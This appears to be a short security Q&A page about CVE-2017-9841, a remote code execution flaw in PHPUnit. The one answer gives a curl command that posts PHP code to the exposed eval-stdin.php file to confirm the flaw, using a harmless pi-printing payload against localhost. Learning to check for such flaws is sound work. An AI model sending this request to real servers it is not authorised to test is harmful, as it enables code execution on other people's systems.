Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Need any help mail to [email protected]

How can I exploit CVE-2017-9841 RCE vulnerability in PHPUnit?

0 votes
Lets I've installed PHPUnit version is 5.6.2. Which is vulnerable to Remote Code Execution. How can I check this vulnerability?
by (111 points)

1 Answer

0 votes

Let's you have that vulnerable PHPUnit in http://localhost/vendor/phpunit/.

So you can check by printing the value of pi using this cURL command.

$ curl --data "<?php echo(pi());" http://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
by (271 points)
 | Snow Theme by Q2A Market
Powered by Question2Answer
...